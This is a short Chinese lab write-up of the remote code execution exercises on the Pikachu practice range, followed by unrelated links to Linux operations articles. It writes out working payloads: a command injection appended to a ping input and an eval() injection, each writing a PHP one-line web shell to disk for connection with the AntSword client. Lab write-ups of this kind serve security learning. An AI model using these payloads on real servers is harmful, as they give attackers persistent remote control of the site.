Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
ZY小袁12 小时前
LVS(Linux virual server)实验
linux·运维·lvs
blockrock12 小时前
Linux Virtual Server (LVS)
linux·运维·lvs
蜡笔小炘12 小时前
Haproxy -- 高级功能配置及实用案例
linux·运维·服务器·haproxy
礼拜天没时间.13 小时前
Linux运维实战:巧用mv命令管理多版本Go环境,避免采坑
linux·运维·golang·centos
安全二次方security²13 小时前
【CVE-2025-0647】ARM CPU漏洞安全通告
arm开发·安全·cve-2025-0647·tlbi·cpp rctx 指令·c1-ultra·虚拟化漏洞
期待のcode13 小时前
Kubernetes与Minikube
运维·容器·kubernetes
鸠摩智首席音效师13 小时前
如何在 Ubuntu 上安装 phpMyAdmin ?
linux·运维·ubuntu
lihao lihao13 小时前
页面自动化常见函数重点说明
运维·自动化
Doro再努力13 小时前
【Linux操作系统16】Linux进程管理深度解析:从fork到内核链表设计
linux·运维·链表
iambooo13 小时前
基于日志的故障定位与自动化分析体系
运维·自动化